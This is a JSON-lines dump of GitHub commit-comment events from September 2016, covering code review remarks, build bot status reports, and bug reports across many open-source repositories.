{"id":"4590161368","type":"CommitCommentEvent","actor":{"login":"thangngoc89"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19097518,"position":null,"line":null,"path":null,"commit_id":"755a3c2537dd94401af061572845c4165dee4322","created_at":"2016-09-20T14:48:54Z","updated_at":"2016-09-20T14:48:54Z","body":"@MoOx This commit doesn't disable SW. I'm stills seeing it"}},"created_at":"2016-09-20T14:48:54Z"}
{"id":"4590163852","type":"CommitCommentEvent","actor":{"login":"Serg-Norseman"},"repo":{"name":"Serg-Norseman/CalendarConverter"},"payload":{"comment":{"id":19097525,"position":21,"line":220,"path":"CalendarConverterTests/UDNTests.cs","commit_id":"c27427ae830add3b739f7cfba1986a20f69e9a52","created_at":"2016-09-20T14:49:16Z","updated_at":"2016-09-20T14:49:16Z","body":"I can not understand why all the formulas are so different from each other"}},"created_at":"2016-09-20T14:49:16Z"}
{"id":"4590167243","type":"CommitCommentEvent","actor":{"login":"daira"},"repo":{"name":"david415/tahoe-lafs"},"payload":{"comment":{"id":19097531,"position":null,"line":null,"path":null,"commit_id":"969503eb7fa4f0a11c84bf9a46ffa37bf64c17ee","created_at":"2016-09-20T14:49:46Z","updated_at":"2016-09-20T14:49:46Z","body":"Otherwise ACK"}},"created_at":"2016-09-20T14:49:46Z"}
{"id":"4590168160","type":"CommitCommentEvent","actor":{"login":"MoOx"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19097532,"position":null,"line":null,"path":null,"commit_id":"755a3c2537dd94401af061572845c4165dee4322","created_at":"2016-09-20T14:49:54Z","updated_at":"2016-09-20T14:49:54Z","body":"Maybe you need to clear your browser cache?"}},"created_at":"2016-09-20T14:49:54Z"}
{"id":"4590168272","type":"CommitCommentEvent","actor":{"login":"daira"},"repo":{"name":"david415/tahoe-lafs"},"payload":{"comment":{"id":19097533,"position":null,"line":null,"path":null,"commit_id":"aca849a581f10c434039e26ef74af022a82cc54d","created_at":"2016-09-20T14:49:55Z","updated_at":"2016-09-20T14:49:55Z","body":"ACK"}},"created_at":"2016-09-20T14:49:55Z"}
{"id":"4590172210","type":"CommitCommentEvent","actor":{"login":"jrah"},"repo":{"name":"matthewmorek/wfp-careers-search"},"payload":{"comment":{"id":19097540,"position":null,"line":null,"path":null,"commit_id":"42fb6b0f42f511c425a16467d7f255a8409e6f27","created_at":"2016-09-20T14:50:29Z","updated_at":"2016-09-20T14:50:29Z","body":"Fix #8"}},"created_at":"2016-09-20T14:50:29Z"}
{"id":"4590176260","type":"CommitCommentEvent","actor":{"login":"huitseeker"},"repo":{"name":"ScalaRomandie/Raffle"},"payload":{"comment":{"id":19097551,"position":null,"line":null,"path":null,"commit_id":"dacd87d59e2d73fd85773a87c5fe28ed98038696","created_at":"2016-09-20T14:51:05Z","updated_at":"2016-09-20T14:51:05Z","body":"You may want to pass an instance of `java.security.SecureRandom` to the constructor of `scala.util.Random` instead of the default `java.util.Random` (or use the `javaRandomToRandom` implicit, I invite you to read [the class](https://github.com/scala/scala/blob/2.12.x/src/library/scala/util/Random.scala#L21) to see the plethora of methods). Otherwise you expose yourself to accusations of tricking/tuning the poor LFSR being used in your jvm run, thus picking favorites.\r\n\r\nAlternatively, for a true \"millenial\" way of guaranteeing the randomness of your pick, you can feed your shuffle with one of the webservices that will generate random numbers for you online."}},"created_at":"2016-09-20T14:51:05Z"}
{"id":"4590176590","type":"CommitCommentEvent","actor":{"login":"thangngoc89"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19097554,"position":null,"line":null,"path":null,"commit_id":"755a3c2537dd94401af061572845c4165dee4322","created_at":"2016-09-20T14:51:08Z","updated_at":"2016-09-20T14:51:08Z","body":"I tried it in private mode and in a different browser."}},"created_at":"2016-09-20T14:51:08Z"}
{"id":"4590177868","type":"CommitCommentEvent","actor":{"login":"pablomh"},"repo":{"name":"SonyAosp/vendor_sony"},"payload":{"comment":{"id":19097557,"position":null,"line":null,"path":null,"commit_id":"c630e5166e06a266e199e58d05918dd99c235d39","created_at":"2016-09-20T14:51:19Z","updated_at":"2016-09-20T14:51:19Z","body":"Hello @alviteri ,\r\n\r\nIt seems that since this change I'm not able to build tulip:\r\n\r\n```\r\n. . .\r\nincluding ./vendor/sony/kanuti-common/proprietary/Android.mk ...\r\nincluding ./vendor/sony/kanuti-tulip/proprietary/Android.mk ...\r\nbuild/core/base_rules.mk:183: *** vendor/sony/kanuti-tulip/proprietary: MODULE.TARGET.SHARED_LIBRARIES.sensors.tulip already defined by vendor/sony/kanuti-tulip/proprietary.\r\nbuild/core/ninja.mk:163: recipe for target '/home/pablomh/WORKSPACE/out/build-aosp_e2303-dist.ninja' failed\r\nmake: *** [/home/pablomh/WORKSPACE/out/build-aosp_e2303-dist.ninja] Error 1\r\n```\r\n\r\nAs it seems that with the removal of LOCAL_MULTILIB both \"sensors.tulip\" and \"libbtnv\" are duplicated.\r\n\r\n\r\nRegards.\r\nPablo\r\n\r\n"}},"created_at":"2016-09-20T14:51:19Z"}
{"id":"4590179987","type":"CommitCommentEvent","actor":{"login":"VickieLynch"},"repo":{"name":"mantidproject/mantid"},"payload":{"comment":{"id":19097562,"position":null,"line":null,"path":null,"commit_id":"c0da5ec95f301f134eb45ab54b9c6369a51a9bc1","created_at":"2016-09-20T14:51:37Z","updated_at":"2016-09-20T14:51:37Z","body":"This is attached to the wrong issue"}},"created_at":"2016-09-20T14:51:37Z"}
{"id":"4590182780","type":"CommitCommentEvent","actor":{"login":"cathay4t"},"repo":{"name":"cathay4t/libstoragemgmt"},"payload":{"comment":{"id":19097567,"position":null,"line":null,"path":null,"commit_id":"286afa2089557323ce7de44ed6804c200602e6d8","created_at":"2016-09-20T14:52:00Z","updated_at":"2016-09-20T14:52:00Z","body":"Fixed in https://github.com/cathay4t/libstoragemgmt/commit/86610063fe0a7c5bc24c40c7dffb5f1bab463324\r\nThanks."}},"created_at":"2016-09-20T14:52:00Z"}
{"id":"4590189270","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19097587,"position":null,"line":null,"path":null,"commit_id":"3b70074de00491478ca32a2c24f4591e4409aea0","created_at":"2016-09-20T14:52:57Z","updated_at":"2016-09-20T14:52:57Z","body":"Hmm, so why is there a bench change, then? I have to investigate :-)"}},"created_at":"2016-09-20T14:52:57Z"}
{"id":"4590193834","type":"CommitCommentEvent","actor":{"login":"linzjax"},"repo":{"name":"Cadasta/cadasta-platform"},"payload":{"comment":{"id":19097603,"position":5,"line":269,"path":"cadasta/organization/forms.py","commit_id":"d5ae6a2c444bb01ac94cb658dde4de2f74d8814d","created_at":"2016-09-20T14:53:36Z","updated_at":"2016-09-20T14:53:36Z","body":"Whoops you're absolutely right that `.all()` is not needed. Thanks!"}},"created_at":"2016-09-20T14:53:36Z"}
{"id":"4590197107","type":"CommitCommentEvent","actor":{"login":"NachoSoto"},"repo":{"name":"ReactiveCocoa/ReactiveSwift"},"payload":{"comment":{"id":19097611,"position":null,"line":null,"path":null,"commit_id":"bd7a9f4da5530a0bba07c4b2a8e19cc9cdaf5d4c","created_at":"2016-09-20T14:54:04Z","updated_at":"2016-09-20T14:54:04Z","body":":+1: for starting with a failing test!"}},"created_at":"2016-09-20T14:54:04Z"}
{"id":"4590197299","type":"CommitCommentEvent","actor":{"login":"evanweaver"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19097612,"position":null,"line":null,"path":null,"commit_id":"056b267146b2368e483ebbe2caadd52fff6c1aa5","created_at":"2016-09-20T14:54:06Z","updated_at":"2016-09-20T14:54:06Z","body":"No worries @macumber, I will roll a build (probably tomorrow) which also incorporates baseline automation.\r\n"}},"created_at":"2016-09-20T14:54:06Z"}
{"id":"4590201548","type":"CommitCommentEvent","actor":{"login":"linzjax"},"repo":{"name":"Cadasta/cadasta-platform"},"payload":{"comment":{"id":19097624,"position":1,"line":266,"path":"cadasta/organization/forms.py","commit_id":"d5ae6a2c444bb01ac94cb658dde4de2f74d8814d","created_at":"2016-09-20T14:54:41Z","updated_at":"2016-09-20T14:54:41Z","body":"Uuuh nope no reason. Missed it. I didn't do a lot of testing with superusers."}},"created_at":"2016-09-20T14:54:41Z"}
{"id":"4590204125","type":"CommitCommentEvent","actor":{"login":"morlovich"},"repo":{"name":"pagespeed/ngx_pagespeed"},"payload":{"comment":{"id":19097631,"position":93,"line":229,"path":"scripts/build_ngx_pagespeed.sh","commit_id":"18711eccc4b39b1bd8403a8bd1430bb0e1e5622a","created_at":"2016-09-20T14:55:05Z","updated_at":"2016-09-20T14:55:05Z","body":"Trunk should be clearly building as C++11....\n\n\nOn Tue, Sep 20, 2016 at 10:29 AM, hillsp <notifications@github.com> wrote:\n\n> Should we require a version of nginx with this fix: #1248 (comment)\n> <https://github.com/pagespeed/ngx_pagespeed/issues/1248#issuecomment-240549193>\n> The current release branch is OK but trunk isn't.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/pagespeed/ngx_pagespeed/commit/18711eccc4b39b1bd8403a8bd1430bb0e1e5622a#commitcomment-19097140>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADl1RJIXdIxYoQQay_VBt4AdF0eqGvAjks5qr-3mgaJpZM4KBskc>\n> .\n>\n"}},"created_at":"2016-09-20T14:55:05Z"}
{"id":"4590204341","type":"CommitCommentEvent","actor":{"login":"JTFouquier"},"repo":{"name":"SuLab/mark2cure"},"payload":{"comment":{"id":19097633,"position":null,"line":null,"path":null,"commit_id":"c21cdbbc73ce96e75198c74122ff62e69f33bcbb","created_at":"2016-09-20T14:55:07Z","updated_at":"2016-09-20T14:55:07Z","body":"Was there a script that updated this for you? Wow. "}},"created_at":"2016-09-20T14:55:07Z"}
{"id":"4590204441","type":"CommitCommentEvent","actor":{"login":"maghrabe"},"repo":{"name":"maghrabe/MGRepository"},"payload":{"comment":{"id":19097634,"position":null,"line":null,"path":null,"commit_id":"58dd7bd1d9170d3d0bea4a5dcb8d4aa33e9baa87","created_at":"2016-09-20T14:55:09Z","updated_at":"2016-09-20T14:55:09Z","body":"nkjjhjh"}},"created_at":"2016-09-20T14:55:09Z"}
{"id":"4590204908","type":"CommitCommentEvent","actor":{"login":"NachoSoto"},"repo":{"name":"ReactiveCocoa/ReactiveSwift"},"payload":{"comment":{"id":19097635,"position":7,"line":90,"path":"Tests/ReactiveSwiftTests/DisposableSpec.swift","commit_id":"bd7a9f4da5530a0bba07c4b2a8e19cc9cdaf5d4c","created_at":"2016-09-20T14:55:12Z","updated_at":"2016-09-20T14:55:12Z","body":"Why not use `expect(type(of: scoped)) == ...` instead?"}},"created_at":"2016-09-20T14:55:12Z"}
{"id":"4590210304","type":"CommitCommentEvent","actor":{"login":"tombsar"},"repo":{"name":"glfw/glfw"},"payload":{"comment":{"id":19097646,"position":null,"line":null,"path":null,"commit_id":"f7584bf14cd470f581a505cd5d93aab20ee3fa78","created_at":"2016-09-20T14:55:58Z","updated_at":"2016-09-20T14:55:58Z","body":"I'm curious why the move to OpenGL 2? Does it have any hidden benefits?"}},"created_at":"2016-09-20T14:55:58Z"}
{"id":"4590211240","type":"CommitCommentEvent","actor":{"login":"raniamlj"},"repo":{"name":"hardmaru/sketch-rnn"},"payload":{"comment":{"id":19097650,"position":null,"line":null,"path":null,"commit_id":"37e8c0817d776300454ba1a0c387cc55a7c2ae55","created_at":"2016-09-20T14:56:08Z","updated_at":"2016-09-20T14:56:08Z","body":"Hi \r\nwhen i try to launch this program i get those errors :\r\n---------------------------\r\ncreating training data cpkl file from raw source\r\nI tensorflow/core/common_runtime/local_device.cc:25] Local device intra op parallelism threads: 4\r\nI tensorflow/core/common_runtime/local_session.cc:45] Local session inter op parallelism threads: 4\r\nTraceback (most recent call last):\r\n  File \"/sketch-rnn-master/train.py\", line 99, in <module>\r\n    main()\r\n  File \"/sketch-rnn-master/train.py\", line 45, in main\r\n    train(args)\r\n  File \"/sketch-rnn-master/train.py\", line 83, in train\r\n    input_data, target_data = data_loader.next_batch()\r\n  File \"/sketch-rnn-master/utils.py\", line 263, in next_batch\r\n    seq = next_seq(skip_length)\r\n  File \"/sketch-rnn-master/utils.py\", line 238, in next_seq\r\n    data = self.current_data()\r\n  File \"/sketch-rnn-master/utils.py\", line 271, in current_data\r\n    return self.raw_data[self.index[self.pointer]]\r\nIndexError: index 0 is out of bounds for axis 0 with size 0\r\n-----------------\r\n\r\nhelp please !"}},"created_at":"2016-09-20T14:56:08Z"}
{"id":"4590213492","type":"CommitCommentEvent","actor":{"login":"Lukas1990"},"repo":{"name":"ccrisan/motioneyeos"},"payload":{"comment":{"id":19097663,"position":null,"line":null,"path":null,"commit_id":"7fe6ed1eb6ef2291b830c3711857595770f01f9d","created_at":"2016-09-20T14:56:27Z","updated_at":"2016-09-20T14:56:27Z","body":"I have now a lot of work. Maybe can i send this until 1 week."}},"created_at":"2016-09-20T14:56:27Z"}
{"id":"4590217934","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"robcore/machinex"},"payload":{"comment":{"id":19097682,"position":null,"line":null,"path":null,"commit_id":"a704f73ecde50566ae6c8bcd54242de3905ef906","created_at":"2016-09-20T14:57:06Z","updated_at":"2016-09-20T14:57:06Z","body":"Ah you're my hero! Thanks! But yeah, without any other updates to audio (I have a bad q6asm patch I need to revisit that's causing distortion) the root freq at 22 is a magic value : ) I'm gonna try cherry picking again because I know a lot of android kernel devs like the direct link to their commits."}},"created_at":"2016-09-20T14:57:06Z"}
{"id":"4590218969","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19097685,"position":null,"line":null,"path":null,"commit_id":"267558b8d6694e56c6cb103056e24fdb53064fb0","created_at":"2016-09-20T14:57:15Z","updated_at":"2016-09-20T14:57:15Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-20T14:57:15Z"}
{"id":"4590219189","type":"CommitCommentEvent","actor":{"login":"nirvdrum"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19097687,"position":null,"line":null,"path":null,"commit_id":"d50342c5fa2b10a4571876053a30f9106fb00d3a","created_at":"2016-09-20T14:57:16Z","updated_at":"2016-09-20T14:57:16Z","body":"If you're going to eager-load encodings, you may as well take a pass through `EncodingOperations` to remove the loading code from there. All of that can be simpler now."}},"created_at":"2016-09-20T14:57:16Z"}
{"id":"4590220941","type":"CommitCommentEvent","actor":{"login":"sergiobetterelli"},"repo":{"name":"sergiobetterelli/test1"},"payload":{"comment":{"id":19097697,"position":null,"line":null,"path":null,"commit_id":"0b52c93dc3addc9fb50f0c95a2c80f410effb24e","created_at":"2016-09-20T14:57:31Z","updated_at":"2016-09-20T14:57:31Z","body":"PROJ-1 test commit66"}},"created_at":"2016-09-20T14:57:31Z"}
{"id":"4590225809","type":"CommitCommentEvent","actor":{"login":"ikesyo"},"repo":{"name":"ReactiveCocoa/ReactiveSwift"},"payload":{"comment":{"id":19097706,"position":7,"line":90,"path":"Tests/ReactiveSwiftTests/DisposableSpec.swift","commit_id":"bd7a9f4da5530a0bba07c4b2a8e19cc9cdaf5d4c","created_at":"2016-09-20T14:58:13Z","updated_at":"2016-09-20T14:58:13Z","body":"I'm not sure why but that didn't compile :disappointed:"}},"created_at":"2016-09-20T14:58:13Z"}
{"id":"4590226719","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19097709,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-20T14:58:21Z","updated_at":"2016-09-20T14:58:21Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.174](http://build.clear-measure.com/viewLog.html?buildId=10542&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-20T14:58:21Z"}
{"id":"4590229673","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19097718,"position":null,"line":null,"path":null,"commit_id":"7f5bdd82ff166995fea2ff3e7e96a4d6b176e160","created_at":"2016-09-20T14:58:47Z","updated_at":"2016-09-20T14:58:47Z","body":"TaskCluster: @meetmangukiya does not have permission to trigger tasks."}},"created_at":"2016-09-20T14:58:47Z"}
{"id":"4590242879","type":"CommitCommentEvent","actor":{"login":"masalmon"},"repo":{"name":"dacornu/MDvasptools"},"payload":{"comment":{"id":19097752,"position":null,"line":null,"path":null,"commit_id":"88a58c3107c39c6a9a817347d91a37dc85274400","created_at":"2016-09-20T15:00:40Z","updated_at":"2016-09-20T15:00:40Z","body":"Awesome @dacornu ! :smiley_cat: "}},"created_at":"2016-09-20T15:00:40Z"}
{"id":"4590245159","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19097758,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-20T15:01:01Z","updated_at":"2016-09-20T15:01:01Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.174](http://build.clear-measure.com/viewLog.html?buildId=10542&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:39"}},"created_at":"2016-09-20T15:01:01Z"}
{"id":"4590246188","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19097763,"position":null,"line":null,"path":null,"commit_id":"8f031955eb692d33084225fc5e864ca0b2c70354","created_at":"2016-09-20T15:01:10Z","updated_at":"2016-09-20T15:01:10Z","body":"develop (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (1767 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8f031955eb692d33084225fc5e864ca0b2c70354-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8f031955eb692d33084225fc5e864ca0b2c70354-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T15:01:10Z"}
{"id":"4590246296","type":"CommitCommentEvent","actor":{"login":"Rekyt"},"repo":{"name":"Rekyt/divr"},"payload":{"comment":{"id":19097764,"position":null,"line":null,"path":null,"commit_id":"a2214e99c56c8df0bf472a60c156c1d0fbd1102f","created_at":"2016-09-20T15:01:12Z","updated_at":"2016-09-20T15:01:12Z","body":"@pierredenelle @jsegrestin @fvasseur Hey, just to notify you that I updated docs of the functions using `roxygen` so we can now follow `roxygen` documentation for functions see here: http://r-pkgs.had.co.nz/man.html\r\nBasically you just have to run `devtools::document()` after modifying the docs and it will rewrite the `NAMESPACE`file ;)"}},"created_at":"2016-09-20T15:01:12Z"}
{"id":"4590247569","type":"CommitCommentEvent","actor":{"login":"chemix"},"repo":{"name":"nejenophp/nejenophp.cz"},"payload":{"comment":{"id":19097770,"position":null,"line":null,"path":null,"commit_id":"f8b93e269c229cdd3ba7d458505e5befee6f34e8","created_at":"2016-09-20T15:01:22Z","updated_at":"2016-09-20T15:01:22Z","body":"yes"}},"created_at":"2016-09-20T15:01:22Z"}
{"id":"4590249402","type":"CommitCommentEvent","actor":{"login":"nicholascloud"},"repo":{"name":"adamlucz90/RecordmateAngular"},"payload":{"comment":{"id":19097776,"position":29,"line":28,"path":"angular/services/collection.js","commit_id":"08c77236bd46beedb46073e0cbd7a81ff5e7bdf7","created_at":"2016-09-20T15:01:39Z","updated_at":"2016-09-20T15:01:39Z","body":"This isn't a huge deal for your project right now, but I thought you might want to learn a bit about the different ways to send HTTP requests to the server, and how to structure API URL's in a more expressive manner. In collection.js, all of the URLs are in the form `/api/{resource}{operation}`, e.g., `/api/collectionAdd`, and all of the `$http` operations are `post()` operations. While this works, it is semantically incorrect.\r\n\r\nI have put together a document that explains how URLs should be structured and the appropriate `$http` methods to call for each kind of URL: https://gist.github.com/nicholascloud/4dc2c02073a8659a2001a78986b21ba6\r\n\r\nI wouldn't worry too much about this right now; finish out your project features and then update these URLs if you have time."}},"created_at":"2016-09-20T15:01:39Z"}
{"id":"4590251152","type":"CommitCommentEvent","actor":{"login":"elmindreda"},"repo":{"name":"glfw/glfw"},"payload":{"comment":{"id":19097784,"position":null,"line":null,"path":null,"commit_id":"f7584bf14cd470f581a505cd5d93aab20ee3fa78","created_at":"2016-09-20T15:01:54Z","updated_at":"2016-09-20T15:01:54Z","body":"Pedagogic benefits only. GL1 should never be mentioned again. GL1 does not exist. What is this GL1 I'm speaking of? Never heard of it. This is not the API you are looking for. Move along. Move along."}},"created_at":"2016-09-20T15:01:54Z"}
{"id":"4590251608","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19097786,"position":27,"line":235,"path":"californium-core/src/main/java/org/eclipse/californium/core/CoapServer.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-20T15:01:58Z","updated_at":"2016-09-20T15:01:58Z","body":">When executing the test suite, the test cases often hang at this point and stall for the full time before giving up. \r\n\r\nI can not reproduce this. \r\n\r\n> But since this doesn't seem to help anyways, we might also remove the code for running the tasks again\r\n\r\nI think we should go with something like this ? WDYT ? If this is not enough problems is probably in task implementation.\r\n```java\r\n\t\tLOGGER.info(\"Destroying server\");\r\n\t\t// try to shutdown gracefully\r\n\t\texecutor.shutdown();\r\n\t\tboolean succ;\r\n\t\ttry {\r\n\t\t\tsucc = executor.awaitTermination(2, TimeUnit.SECONDS);\r\n\t\t\tif (!succ) {\r\n\t\t\t\t// We don't shutdown in time, so try a more aggressive way.\r\n\t\t\t\tList<Runnable> remainingTasks = executor.shutdownNow();\r\n\t\t\t\tLOGGER.log(Level.WARNING, \"Executor was shutdown. {0}  tasks will not be executed.\", remainingTasks.size());\r\n\t\t\t\tsucc = executor.awaitTermination(2, TimeUnit.SECONDS);\r\n\t\t\t\tif (!succ)\r\n\t\t\t\t\tLOGGER.log(Level.WARNING, \"Executor did not shutdown in time\");\r\n\t\t\t}\r\n\t\t} catch (InterruptedException e) {\r\n\t\t\t// if thread is interrupted we try to to executor actively.\r\n\t\t\texecutor.shutdownNow();\r\n\t\t\tLOGGER.log(Level.WARNING, \"Exception while terminating server executor\", e);\r\n\t\t}\r\n\r\n\t\t// Endpoints should be destroyed after we stop thread.\r\n\t\tfor (Endpoint ep : endpoints) {\r\n\t\t\tep.destroy();\r\n\t\t}\r\n```\r\n"}},"created_at":"2016-09-20T15:01:58Z"}
{"id":"4590253866","type":"CommitCommentEvent","actor":{"login":"Maujor"},"repo":{"name":"railsgirlsmaceio/railsgirlsguides"},"payload":{"comment":{"id":19097792,"position":null,"line":null,"path":null,"commit_id":"62ec65f5391f6560a5a5476b769fd518c10a1b36","created_at":"2016-09-20T15:02:15Z","updated_at":"2016-09-20T15:02:15Z","body":"A linha:\r\nCoach__:Explicar qual o efeito de se definir a largura de uma imagem na marcação HTML como explicado no *passo 4* ...\r\n\r\nFoi traduzida do original:\r\nCoach: Explain what specifying the image width in HTML at the end of *Step 4* ...\r\n\r\nNão ficou claro para mim (tradutor), no texto do tutorial, qual é o *Step 4*\r\n"}},"created_at":"2016-09-20T15:02:15Z"}
{"id":"4590254958","type":"CommitCommentEvent","actor":{"login":"shonumi"},"repo":{"name":"shonumi/gbe-plus"},"payload":{"comment":{"id":19097795,"position":null,"line":null,"path":null,"commit_id":"09b5553597dfda9623393e03581c917d9c68a671","created_at":"2016-09-20T15:02:23Z","updated_at":"2016-09-20T15:02:23Z","body":"Now you can keep your ROMs and game saves separate! Put your saves anywhere you want too."}},"created_at":"2016-09-20T15:02:23Z"}
{"id":"4590256579","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimAnalysis"},"payload":{"comment":{"id":19097801,"position":null,"line":null,"path":null,"commit_id":"93260b15a27a815f81b8b71cbaed3439e361e404","created_at":"2016-09-20T15:02:36Z","updated_at":"2016-09-20T15:02:36Z","body":"TeamCity Xbim :: Xbim Analysis :: XbimAnalysis [Build 22](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1211&buildTypeId=Xbim_XbimAnalysis_XbimAnalysis) is now running\n"}},"created_at":"2016-09-20T15:02:36Z"}
{"id":"4590259418","type":"CommitCommentEvent","actor":{"login":"RobHumphris"},"repo":{"name":"elektron-technology/nedb"},"payload":{"comment":{"id":19097812,"position":5,"line":24,"path":"package.json","commit_id":"a30cbcca4f05e2f400ad418e09a2863bd2abc686","created_at":"2016-09-20T15:02:59Z","updated_at":"2016-09-20T15:02:59Z","body":"Hi, thanks for that observation - that fork has been abandoned."}},"created_at":"2016-09-20T15:02:59Z"}
{"id":"4590260249","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimAnalysis"},"payload":{"comment":{"id":19097813,"position":null,"line":null,"path":null,"commit_id":"93260b15a27a815f81b8b71cbaed3439e361e404","created_at":"2016-09-20T15:03:05Z","updated_at":"2016-09-20T15:03:05Z","body":"TeamCity Xbim :: Xbim Analysis :: XbimAnalysis [Build 22](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1211&buildTypeId=Xbim_XbimAnalysis_XbimAnalysis) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:32"}},"created_at":"2016-09-20T15:03:05Z"}
{"id":"4590260507","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"aseba-community/aseba-target-thymio2"},"payload":{"comment":{"id":19097816,"position":4,"line":510,"path":"main.c","commit_id":"a08f8e0145431b3c1b028a2c2bfbda40eb4f01ad","created_at":"2016-09-20T15:03:07Z","updated_at":"2016-09-20T15:03:07Z","body":"Wrong indentation, should be one tab, but rather is 4 spaces."}},"created_at":"2016-09-20T15:03:07Z"}
{"id":"4590262404","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/CalendarConverter"},"payload":{"comment":{"id":19097820,"position":21,"line":220,"path":"CalendarConverterTests/UDNTests.cs","commit_id":"c27427ae830add3b739f7cfba1986a20f69e9a52","created_at":"2016-09-20T15:03:22Z","updated_at":"2016-09-20T15:03:22Z","body":"> up to -4713/11/24\r\n\r\nIt's the beginning of the Julian period. So that's OK.\r\n\r\n> why all the formulas are so different from each other\r\n\r\nThey are just different math models that define the same stuff by different ways."}},"created_at":"2016-09-20T15:03:22Z"}
{"id":"4590270385","type":"CommitCommentEvent","actor":{"login":"lionbrothers"},"repo":{"name":"lionbrothers/stress-testing"},"payload":{"comment":{"id":19097831,"position":1,"line":1,"path":"README.md","commit_id":"91f7bb77766cad3012e0d9158acaaef41c3fbcc3","created_at":"2016-09-20T15:04:29Z","updated_at":"2016-09-20T15:04:29Z","body":"test comment 1"}},"created_at":"2016-09-20T15:04:29Z"}
{"id":"4590277606","type":"CommitCommentEvent","actor":{"login":"mjtko"},"repo":{"name":"alces-software/flight-appliance-docs"},"payload":{"comment":{"id":19097853,"position":391,"line":391,"path":"docs/source/pbspro/pbspro.rst","commit_id":"3aac8e8995314598f08e66d4f0a3553314dfcc51","created_at":"2016-09-20T15:05:33Z","updated_at":"2016-09-20T15:05:33Z","body":"@vlj91: Can you update the URL to point this to the right place please?"}},"created_at":"2016-09-20T15:05:33Z"}
{"id":"4590279835","type":"CommitCommentEvent","actor":{"login":"MoOx"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19097859,"position":null,"line":null,"path":null,"commit_id":"755a3c2537dd94401af061572845c4165dee4322","created_at":"2016-09-20T15:05:53Z","updated_at":"2016-09-20T15:05:53Z","body":"I just tried in a browser in private mode, no SW is installed. I don't see how (with this options) SW could be enabled. You may have some cache or something. Cannot reproduce on Firefox."}},"created_at":"2016-09-20T15:05:53Z"}
{"id":"4590281731","type":"CommitCommentEvent","actor":{"login":"icomrade"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19097868,"position":null,"line":null,"path":null,"commit_id":"c97015fb9abcd6577d2458833058dfac54179aac","created_at":"2016-09-20T15:06:10Z","updated_at":"2016-09-20T15:06:10Z","body":"Yeah like I said you can remove the parts but if you set them to 100% damage the car blows up."}},"created_at":"2016-09-20T15:06:10Z"}
{"id":"4590283266","type":"CommitCommentEvent","actor":{"login":"InsulaVentus"},"repo":{"name":"InsulaVentus/directory-listener"},"payload":{"comment":{"id":19097875,"position":null,"line":null,"path":null,"commit_id":"c4df313c381b19a90144f7f07138bea96da127fc","created_at":"2016-09-20T15:06:23Z","updated_at":"2016-09-20T15:06:23Z","body":"Great work!"}},"created_at":"2016-09-20T15:06:23Z"}
